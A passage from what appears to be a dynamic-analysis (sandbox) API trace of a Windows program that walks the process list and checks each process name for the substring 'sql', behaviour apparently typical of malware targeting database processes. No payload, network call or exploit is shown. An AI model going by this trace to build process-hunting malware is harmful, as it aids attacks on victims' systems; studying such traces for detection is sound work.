lpUsedDefaultChar=0x0) returned 12 [0126.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.041] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.041] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.042] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582fd8 [0126.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582fd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.042] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.042] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0126.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.044] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582d80 [0126.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3582d80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0126.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0126.044] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0126.044] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.045] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582e28 [0126.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582e28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.045] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.046] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0126.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.047] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582f60 [0126.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3582f60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0126.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0126.047] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0126.047] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0126.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0126.257] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582d98 [0126.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3582d98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0126.257] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0126.257] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0126.258] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.259] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582e70 [0126.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582e70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.259] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.259] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0126.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0126.260] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582f78 [0126.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3582f78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0126.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0126.260] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0126.261] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0126.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.262] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582d08 [0126.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3582d08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0126.262] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0126.262] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0126.262] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0126.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.263] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357fc40 [0126.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357fc40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0126.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0126.264] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0126.264] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0126.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0126.265] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35858f0 [0126.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x35858f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0126.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0126.265] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0126.265] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0126.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0126.267] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fc00 [0126.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357fc00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0126.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0126.267] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0126.267] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0126.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0126.268] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357fba0 [0126.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357fba0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0126.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0126.269] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0126.269] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0126.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.270] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582e40 [0126.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3582e40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0126.270] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0126.270] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0126.270] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0126.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0126.272] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f920 [0126.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f920, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0126.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0126.272] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0126.272] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0126.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.273] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582e88 [0126.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3582e88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0126.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0126.273] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0126.273] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0126.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.275] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582e10 [0126.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3582e10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0126.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0126.275] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0126.275] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0126.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0126.276] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585af8 [0126.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3585af8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0126.276] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0126.276] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0126.276] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0126.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.277] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357fbe0 [0126.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357fbe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0126.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0126.277] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0126.277] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0126.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0126.278] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585878 [0126.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3585878, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0126.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0126.278] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0126.278] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0126.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.279] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596708 [0126.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3596708, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0126.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0126.280] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0126.280] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0126.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0126.281] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582de0 [0126.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3582de0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0126.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0126.281] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0126.281] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0126.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0126.285] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585c10 [0126.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3585c10, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0126.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0126.285] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0126.285] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0126.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.286] 